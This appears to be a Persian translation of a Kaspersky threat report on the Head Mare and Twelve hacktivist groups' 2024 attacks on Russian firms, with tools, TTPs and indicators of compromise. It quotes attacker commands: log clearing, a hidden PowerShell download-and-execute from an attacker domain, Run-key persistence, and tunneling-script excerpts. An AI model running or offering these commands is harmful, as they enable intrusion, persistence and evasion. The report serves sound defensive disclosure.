روابط عمومی شرکت ایدکو (توزیع‌کننده‌ی محصولات کسپرسکی در ایران)؛ 

مقدمه

در سپتامبر 2024، مجموعه‌ای از حملات به شرکت‌های روسی صورت گرفت که شاخص‌هایی از نفوذ و تاکتیک‌هایی را نشان داد که با دو گروه هکتیویستی به نام‌های Head Mare و Twelve مرتبط بود. تحقیقات ما نشان داد که گروه Head Mare به شدت از ابزارهایی استفاده می‌کند که قبلاً با گروه Twelve مرتبط بوده است. علاوه بر این، حملات گروه Head Mare از سرورهای فرمان و کنترل (C2) که پیش از این فقط با Twelve مرتبط بودند، بهره برده است. این امر نشان‌دهنده همکاری بالقوه و انجام کمپین‌های مشترک میان این دو گروه است.

حمله‌کنندگان همچنان در حال بهبود و پالایش روش‌های خود هستند و از ابزارهای آشنا از حملات قبلی گروه Head Mare  و همچنین ابزارهای جدید مبتنی بر PowerShell استفاده می‌کنند. این گزارش به تحلیل نرم‌افزارها و تکنیک‌هایی که در حملات اخیر گروه Head Mare مشاهده شده است می‌پردازد و نحوه هم‌پوشانی آن‌ها با فعالیت‌های گروه Twelve را بررسی می‌کند. تمرکز اصلی بر روی TTPs (تاکتیک‌ها، تکنیک‌ها و رویه‌ها) گروه Head Mare و تحولاتی است که در آن‌ها مشاهده شده است، همراه با اشاره به شباهت‌ها و هم‌پوشانی‌ها با TTPs گروه Twelve.

جزئیات فنی

کیت ابزار Head Mare

حمله‌کنندگان از ابزارهای مختلفی که به طور عمومی در دسترس هستند، از جمله نرم‌افزارهای متن‌باز و ابزارهای پروانه‌ای فاش شده، برای دستیابی به اهداف خود استفاده کردند.

• mimikatz
• ADRecon
• secretsdump
• ProcDump
• Localtonet
• revsocks
• ngrok
• cloudflared
• Gost
• fscan
• SoftPerfect Network Scanner
• mRemoteNG
• PSExec
• smbexec
• wmiexec
• LockBit 3.0
• Babuk

برخی از این ابزارها قبلاً در گزارش‌های قبلی ما درباره گروه Head Mare ذکر شده بودند، در حالی که برخی دیگر به تازگی به زرادخانه آن‌ها افزوده شده است.

ابزارهای جدید قابل توجه

در میان ابزارهایی که گروه Head Mare استفاده کرده است، تعدادی ابزار وجود داشت که قبلاً توسط آن‌ها استفاده نمی‌شد، اما در حملات دیگر گروه‌ها مشاهده شده بودند. به عنوان مثال، آن‌ها از بدافزارCobInt برای دسترسی از راه دور به کنترلرهای دامنه استفاده کرده‌اند، ابزاری که قبلاً تنها در حملات گروه Twelve به شرکت‌های روسی مشاهده شده بود. این نکته جالب نشان‌دهنده اشتراک ابزارها بین گروه‌های Twelve و Head Mare  است. علاوه بر CobInt، حمله‌کنندگان از ابزار مخفی PhantomJitter خود برای دسترسی به سرورها و اجرای دستورات از راه دور استفاده کرده‌اند. این ابزار در ماه اوت 2024 به زرادخانه گروه اضافه شد. نحوه عملکرد آن در گزارش‌های تهدید منتشر شده برای مشترکین توضیح داده شده است.

یک تاکتیک جدید دیگر شامل استفاده از ابزاری برای اجرای دستورات از راه دور بر روی سرورهای پلت‌فرم اتوماسیون کسب و کار بود. بنابراین، حمله‌کنندگان از ابزارهای اثبات‌شده و جدید برای نمایش انعطاف‌پذیری و تطبیق‌پذیری خود استفاده کرده‌اند.

دسترسی اولیه

گرچه در حملات قبلی گروه Head Mare تنها از ایمیل‌های فیشینگ با پیوست‌های مخرب استفاده می‌شد، اما اکنون آن‌ها به زیرساخت‌های قربانیان از طریق پیمانکاران آسیب‌دیده که دسترسی به پلت‌فرم‌های اتوماسیون کسب و کار و اتصالات RDP دارند، نفوذ می‌کنند. این روند تایید می‌کند که هکتیویست‌ها از روابط مورد اعتماد بهره‌برداری می‌کنند (  T1199  -رابطه اعتماد و T1078  -حساب‌های معتبر).

حمله‌کنندگان همچنین از آسیب‌پذیری‌های نرم‌افزاری، به ویژه CVE-2023-38831 در WinRAR، از طریق ایمیل‌های فیشینگ سوء استفاده کرده‌اند. در یکی از موارد، آن‌ها از آسیب‌پذیری Microsoft Exchange Server به نام CVE-2021-26855 (ProxyLogon) استفاده کردند. با اینکه این آسیب‌پذیری در سال 2021 پچ شده بود، همچنان به دلیل استفاده سازمان‌ها از سیستم‌عامل‌ها و نرم‌افزارهای قدیمی قابل سوء استفاده است. داده‌های تله‌متری ما نشان داد که کنترلرهای دامنه همچنان با نسخه‌های قدیمی سیستم‌عامل‌های Windows Server 2012 R2 یا Microsoft Exchange Server 2016 استفاده می‌شوند. حمله‌کنندگان از ProxyLogon برای اجرای دستوری به منظور دانلود و اجرای CobInt بر روی سرور استفاده کردند.

پایداری

روش‌های تثبیت پایداری تغییر کرده است. به جای ایجاد وظایف برنامه‌ریزی‌شده، حمله‌کنندگان اکنون کاربران محلی جدیدی با دسترسی‌های ویژه در سرور پلت‌فرم اتوماسیون کسب و کار ایجاد می‌کنند. آن‌ها از این حساب‌ها برای اتصال به سرور از طریق RDP و انتقال و اجرای ابزارها به صورت تعاملی استفاده می‌کنند.

همچنین آن‌ها ابزارهایی مانند Localtonet را برای دسترسی پایدار به میزبان هدف نصب می‌کنند. حمله‌کنندگان از Non-Sucking Service Manager (NSSM) برای پایدار کردن Localtonet استفاده می‌کنند. NSSM این امکان را فراهم می‌آورد که هر برنامه‌ای را به عنوان یک سرویس ویندوز اجرا و در صورت خرابی، آن را دوباره راه‌اندازی کنند. این ابزار کاربردی معمولاً برای نصب و مدیریت برنامه‌هایی که نمی‌توانند به عنوان سرویس عمل کنند، استفاده می‌شود. Localtonet و NSSM به حمله‌کنندگان کمک می‌کنند تا دسترسی مداوم به میزبان آلوده را حفظ کنند.

تکنیک‌های ضد شناسایی

گروه Head Mare همچنان از تکنیک پنهان‌سازی (T1655) استفاده می‌کند و نام‌های اجرایی ابزارها را به نام‌های استاندارد فایل‌های سیستم‌عامل تغییر می‌دهد.
تکنیک‌های ضد شناسایی و حذف آثار

در یکی از حملات، فایل cmd.exe  به log.exe  تغییر نام داده شد و از مسیر C:\Users[username]\log.exe اجرا شد. علاوه بر تغییر نام فایل‌ها، حمله‌کنندگان همچنین خدمات و فایل‌هایی که ایجاد کرده بودند را حذف کرده و تاریخچه رویدادها را برای جلوگیری از شناسایی پاک کردند. شواهد مربوط به این اقدامات در تاریخچه دستورات PowerShell در دستگاه‌های آلوده یافت شد. برخی از دستورات شامل موارد زیر می‌شدند:

pgsql

CopyEdit

stop-service -name <servicename>

remove-service -name <servicename>

remove-service -name "<servicename>"

sc stop <servicename>

sc delete <servicename>

Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

این دستورات نشان‌دهنده تلاش حمله‌کنندگان برای جلوگیری از شناسایی و پاک کردن هرگونه ردپای خود در سیستم است. همچنین، فایل اجرایی ransomware نیز اقدام به پاک کردن لاگ‌های سیستم کرده است که با توجه به تنظیمات موجود در نمونه‌های بررسی‌شده، به وضوح قابل مشاهده است.

فرمان و کنترل

پس از بهره‌برداری از سرور پلت‌فرم اتوماسیون کسب و کار، حمله‌کنندگان بدافزار PhantomJitter را دانلود و نصب کردند. در رخدادهای مشاهده‌شده، این بدافزار از آدرس‌های زیر در زیرساخت‌های قربانیان دانلود شد:

less

CopyEdit

http[:]//45.87.246[.]34:443/calc.exe

http[:]//185.158.248[.]107:443/calc.exe

پس از دانلود، این فایل به صورت c.exe  در دایرکتوری محلی ذخیره شد. پس از اجرا، بدافزار به سرور فرمان و کنترل (C2) متصل شد و به حمله‌کننده این امکان را داد تا دستورات دلخواه را بر روی میزبان آلوده اجرا کند.

علاوه بر PhantomJitter، حمله‌کنندگان از CobInt  نیز استفاده کردند که بارگذاری آن به سرور C2 زیر متصل می‌شود:

css

CopyEdit

360nvidia[.]com

این دامنه به IP آدرس 45.156.27[.]115  اشاره دارد.

گردش در مسیر

گروه برای دستیابی به اهداف خود در این مرحله از ابزارهای خود استفاده کرد. برای دسترسی از راه دور به زیرساخت‌های آلوده، آن‌ها از یک اسکریپتسفارشی پاورشل به نام proxy.ps1  برای نصب و پیکربندی cloudflared و Gost  استفاده کردند.

Gost  یک ابزار پروکسی سبک و قدرتمند است که قابلیت‌های متعددی برای مسیریابی شبکه و مخفی‌سازی ترافیک ارائه می‌دهد. این ابزار از پروتکل‌های مختلف پشتیبانی می‌کند و می‌تواند کانال‌های ارتباطی امن ایجاد کرده، بلوک‌ها را دور بزند و تونل‌هایی برقرار کند.

Cloudflared  ترافیک را از طریق شبکه Cloudflare تونل می‌کند. این ابزار یک اتصال امن به سرور کنترل‌شده توسط حمله‌کننده برقرار کرده و به عنوان پروکسی برای ارتباطات C2 عمل می‌کند. این امر محدودیت‌های شبکه‌ای مانند NAT (ترجمه آدرس شبکه) و قوانین فایروال را که ممکن است مانع اتصال مستقیم بین میزبان قربانی و سرورهای حمله‌کننده شوند، دور می‌زند.

اسکریپت proxy.ps1  همچنین قادر است آرشیوهایی را از URL‌های مشخص‌شده در خط فرمان دانلود کرده و آن‌ها را به یک پوشه موقت استخراج کند. در زیر خروجی دستور کمک این اسکریپت آمده است:

kotlin

CopyEdit

Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token

 

Parameters:

  -l       Extract archive locally.

  -r       Download and extract archive remotely.

  -p       Specify the port for the gost.

  -t       Specify the token for the cloudflared.

  -u       Uninstall gost & cloudflared.

  -h       Show this help message.

اسکریپت برای نصب cloudflared و Gost  به نام‌هایی مشابه با سرویس‌های استاندارد ویندوز در پوشه C:\Windows\System32 استفاده می‌کند. این اسکریپت از تابع GetTempFileName برای به دست آوردن مسیر فایل‌های موقت استفاده می‌کند. در صورتی که پارامتر -p در خط فرمان مشخص شود، یک سرویس برای ابزار Gost بر روی سیستم نصب خواهد شد. در اینجا یک مثال از تابع نصب سرویس Gost آمده است:

powershell

CopyEdit

function Setup-Gost-Service {

    # Set port

    [xml]$winswxml = Get-Content $winswxmlPath

    $winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p

    $winswxml.Save($winswxmlPath)

    Write-Host "[*] Port number updated to $port in $winswxmlPath"

 

    # Service install

    Write-Host "[*] Installing gost as service"

    Start-Process $winswPath -ArgumentList "install" -RedirectStandardOutput $tempFile -NoNewWindow -Wait

    $output = Get-Content $tempFile

    Write-Output $output

    Start-Process $winswPath -ArgumentList "start" -RedirectStandardOutput $tempFile -NoNewWindow -Wait

    $output = Get-Content $tempFile

    Write-Output $output

}

این کد اسکریپت Gost را به عنوان یک سرویس نصب کرده و تنظیمات لازم را برای آن منتقل می‌کند.

اگر کلید -t به اسکریپت ارسال شود، آن ابزار cloudflared  را نصب و پیکربندی می‌کند. در اینجا تابع نصب برای cloudflared  آورده شده است:

powershell

CopyEdit

function Setup-Cloudflared-Service {

    # Service install

    Write-Host "[*] Installing cloudflared as service"

    Start-Process $cloudflaredPath -ArgumentList "service install $t" -RedirectStandardError $tempFile -NoNewWindow -Wait

    $output = Get-Content $tempFile

    Write-Output $output

}

این کد اسکریپت cloudflared را به عنوان یک سرویس نصب کرده و تنظیمات آن را از طریق خط فرمان منتقل می‌کند.

علاوه بر نصب و پیکربندی ابزارهای تونلینگ، اسکریپت قادر است آثار باقی‌مانده را نیز حذف کند. این اسکریپت می‌تواند خدمات cloudflared و Gost را متوقف کرده و آن‌ها را از سیستم حذف کند، اگر پارامتر -u به آن داده شود.
حذف آثار و ابزارهای مرتبط با تونلینگ و کنترل فرمان

پس از حذف سرویس‌ها، اسکریپت تمامی فایل‌های اجرایی، پیکربندی‌ها و لاگ‌های ابزارها را حذف کرد تا شواهد کمتری از حمله باقی بماند. در یکی از حملات، حمله‌کنندگان cloudflared و Gost  را از سرور 45[.]156[.]21[.]148 دانلود کردند که قبلاً در حملات Head Mare  مشاهده شده بود. یکی از لینک‌های دانلود نمونه به شکل زیر است:

arduino

CopyEdit

hxxp://45[.]156[.]21[.]148:8443/winuac.exe

علاوه بر cloudflared و Gost، حمله‌کنندگان از تونل‌های کلود مانند ngrok  و Localtonet  استفاده کردند. Localtonet یک سرور پروکسی معکوس است که دسترسی به خدمات لوکال را از طریق اینترنت فراهم می‌کند. حمله‌کنندگان آن را به عنوان یک سرویس با استفاده از NSSM راه‌اندازی کردند و هر دو ابزار را از وب‌سایت رسمی Localtonet دانلود کردند:

bash

CopyEdit

hxxp://localtonet[.]com/nssm-2.24.zip

hxxp://localtonet[.]com/download/localtonet-win-64.zip

پس از دانلود، آن‌ها ابزارها را استخراج کرده و با استفاده از دستورات زیر آن‌ها را راه‌اندازی کردند:

php-template

CopyEdit

nssm.exe install Win32_Serv

localtonet.exe authtoken <token>

این دستورات به آن‌ها این امکان را داد که Localtonet  را به عنوان یک سرویس نصب کرده و با استفاده از توکن مربوطه آن را برای پیکربندی مجاز کنند.

 

شناسایی سیستم و جمع‌آوری اطلاعات

حمله‌کنندگان از ابزارهای شناخته‌شده برای شناسایی سیستم استفاده کردند، از جمله quser.exe، tasklist.exe و netstat.exe در میزبان‌های محلی. آن‌ها عمدتاً از fscan و SoftPerfect Network Scanner برای شناسایی شبکه محلی استفاده کردند، همراه با ADRecon، ابزاری برای جمع‌آوری اطلاعات از Active Directory. ADRecon  یک اسکریپت پاورشلاست که قبلاً در سبد ابزار این گروه مشاهده نشده بود.

حمله‌کنندگان همچنین از ADRecon  برای بررسی دامنه Active Directory استفاده کردند که شامل کامپیوترها، حساب‌ها، گروه‌ها و روابط اعتماد بین دامنه‌ها می‌شد. تاریخچه دستورات نشان‌دهنده استفاده از دامنه‌های مختلف به عنوان آرگومان برای اسکریپت بود:

php-template

CopyEdit

.\ADRecon.ps1 -DomainController <FQDN A>

.\ADRecon.ps1 -DomainController <FQDN B>

.\ADRecon.ps1 -DomainController <FQDN C>

 

اوج دسترسی و اجرای فرمان

حمله‌کنندگان از حساب‌های قبلاً آسیب‌دیده از قربانیان و پیمانکاران آن‌ها بهره بردند و حساب‌های محلی با دسترسی‌های خاص ایجاد کردند، به ویژه هنگام بهره‌برداری از سرور نرم‌افزار اتوماسیون کسب و کار. در صورتی که یک کاربر دسترسی کافی برای اجرای دستورات از راه دور در سرور داشته باشد، این نرم‌افزار امکان اجرای فرایندهای فرمان‌دهی مانند cmd.exe را با دسترسی‌های مربوط به نرم‌افزار فراهم می‌آورد. از آنجایی که این نرم‌افزار معمولاً دسترسی‌های مدیر سیستم را در OS دارد، فرایند فرزند نیز به همین صورت دسترسی‌های بالاتر می‌یابد. حمله‌کنندگان از این موقعیت استفاده کردند: پس از دسترسی به سرور نرم‌افزار آسیب‌پذیر، آن‌ها یک حساب محلی با دسترسی‌های ویژه ایجاد کردند که به نام آن فرمان‌دهی را اجرا کردند.

اجرای فرمان‌ها

حمله‌کنندگان Windows command interpreter را در سرور پلتفرم اتوماسیون کسب و کار در سیستم هدف راه‌اندازی کردند و دستور زیر را اجرا کردند:

bash

CopyEdit

cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object

Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt

این دستور فایل vivo.txt را دانلود و اجرا می‌کند که متأسفانه ما نتوانستیم آن را به دست آوریم. با این حال، با توجه به رویدادهای سیستم، حدس زده می‌شود که این فایل یک reverse shell را باز کرده است که حمله‌کننده از آن برای ایجاد دو فایل در سیستم هدف استفاده کرده است:

makefile

CopyEdit

c:\programdata\microsoftdrive\mcdrive.vbs

c:\programdata\microsoftdrive\mcdrive.ps1

سپس با استفاده از reg.exe، حمله‌کنندگان یک ورودی autorun برای اجرای mcdrive.vbs با wscript.exe  اضافه کردند:

bash

CopyEdit

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t

REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs"

 

تشریح فایل‌های مخرب

فایل mcdrive.vbs  یک اسکریپت Visual Basic مخفی است که یک مرجع شیء ActiveX  به نام WScript.Shell  ایجاد کرده و از تابع Run آن برای اجرای یک خط فرمان مخفی استفاده می‌کند.

پس از deobfuscation، این خط فرمان به شکل زیر ظاهر می‌شود:

css

CopyEdit

%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -NonInteractive -NoProfile -w hidden -c iex

([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))

این دستور فایل mcdrive.ps1  را از مسیر C:\ProgramData\MicrosoftDrive  می‌خواند و از طریق مفسرپاورشلاجرا می‌کند. این فایل، یک CobInt loader است که قبلاً تنها در ابزارهای گروه Twelve مشاهده شده بود. اسکریپت mcdrive.ps1 سیستم‌عامل را شناسایی کرده، رمزگشایی کرده و بارگذاری پی‌لود را آغاز می‌کند که سپس یک درخواست به سرور C2 با آدرس 360nvidia[.]com  ارسال می‌کند.

نتیجه‌گیری

گروه Head Mare  به طور فعال در حال گسترش مجموعه تکنیک‌ها و ابزارهای خود است. در حملات اخیر، این گروه برای دسترسی اولیه به زیرساخت هدف از روش‌هایی مانند ایمیل‌های فیشینگ همراه با بهره‌برداری از آسیب‌پذیری‌ها و همچنین نفوذ به سیستم‌های پیمانکاران استفاده کرده است.

این گروه همچنین از ابزارهایی که قبلاً در حملات گروه‌های دیگر مشاهده شده بود ( مانند CobInt  که توسط گروه Twelve استفاده می‌شود) بهره برده است.

این تنها شباهت بین دو گروه نیست. علاوه بر مجموعه ابزارها، نکات زیر نیز قابل توجه است:

• سرورهای مشترک فرمان و کنترل: 360nvidia[.]com و 45.156.27[.]115
• اسکریپت‌هایپاورشلکه به این سرورهای C2 دسترسی دارند: mcdrive.ps1
• اسکریپت‌های تونل‌سازی شبکه: proxy.ps1

با توجه به موارد فوق، فرض بر این است که گروه Head Mare  در حال همکاری با گروه Twelve برای انجام حملات به شرکت‌های دولتی و خصوصی در روسیه است. ما به نظارت بر فعالیت‌های این مهاجمان ادامه خواهیم داد و اطلاعات به‌روزی در مورد تکنیک‌ها و ابزارهای آن‌ها ارائه خواهیم کرد. اطلاعات بیشتری در مورد فعالیت‌های هکتیویست‌ها و ابزارهای آن‌ها، مانند PhantomJitter، در گزارش‌های اطلاعات تهدید برای مشترکین در دسترس است.

شاخص‌های نفوذ

لطفاً توجه داشته باشید که آدرس‌های شبکه ذکر شده در این بخش در زمان انتشار معتبر بودند، اما ممکن است در آینده منقضی شوند.

هش‌ها:

• ADRecon.ps1: 6008E6C3DEAA08FB420D5EFD469590C6
• calc.exe, c.exe: 09BCFE1CCF2E199A92281AADE0F01CAF
• locker.exe: 70C964B9AEAC25BC97055030A1CFB58A
• mcdrive.vbs: 87EECDCF34466A5945B475342ED6BCF2
• mimikatz.exe: E930B05EFE23891D19BC354A4209BE3E
• proxy.ps1: C21C5DD2C7FF2E4BADBED32D35C891E6
• secretsdump.exe, secretsdump (1).exe: 96EC8798BBA011D5BE952E0E6398795D
• update.exe: D6B07E541563354DF9E57FC78014A1DC

مسیرهای فایل:

• C:\Windows\SYSVOL\Intel\locker.exe
• C:\ProgramData\MicrosoftDrive\mcdrive.ps1
• C:\ProgramData\MicrosoftDrive\mcdrive.vbs
• C:\ProgramData\proxy.ps1
• C:\ProgramData\wusa.exe
• C:\Users{USERNAME}\AppData\Roaming\1.bat
• C:\Users{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
• C:\Users{USERNAME}\AppData\Roaming\proxy.ps1
• C:\Users{USERNAME}\Desktop\Обработка.epf
• C:\Users{USERNAME}\Desktop\ad_without_dc.ps1
• C:\Users{USERNAME}\Desktop\ADRecon.ps1
• C:\Users{USERNAME}\Desktop\h.txt
• C:\Users{USERNAME}\Desktop\locker.exe
• C:\Users{USERNAME}\Desktop\mimikatz.exe
• C:\Users{USERNAME}\Desktop\mimikatz.log
• C:\Users{USERNAME}\Desktop\secretsdump (1).exe
• C:\Users{USERNAME}\Desktop\secretsdump.exe
• C:\Users{USERNAME}\Downloads\mimikatz-master.zip
• C:\users{USERNAME}\log.exe
• C:\windows\adfs\ar\update.exe
• C:\windows\system32\inetsrv\c.exe
• C:\windows\system32\inetsrv\calc.exe
• C:\windows\system32\winsw.exe
• C:\Windows\System32\winsws.exe
• C:\windows\system32\winuac.exe
• C:\Windows\SYSVOL\Intel\mimikatz.exe

آدرس‌های IP و نام دامنه‌ها:

• 360nvidia[.]com
• web-telegram[.]uk
• 45.156.27[.]115
• 45.156.21[.]148
• 185.229.9[.]27
• 45.87.246[.]34
• 185.158.248[.]107
• 64.7.198[.]109

 

 کسپرسکی آنلاین (ایدکو)

کسپرسکی اسم یکی از بزرگترین شرکتهای امنیتی و سازنده آنتی ویروس است که برخی از کاربران اشتباهاً این شرکت و محصولات آنتی ویروس آن را با عناوینی نظیر کسپرسکای،کاسپرسکی، کسپراسکای، کسپراسکای، و یا کاسپراسکای نیز می‌شناسد. همچنین لازم به ذکر است مدیرعامل این شرکت نیز یوجین کسپرسکی نام دارد.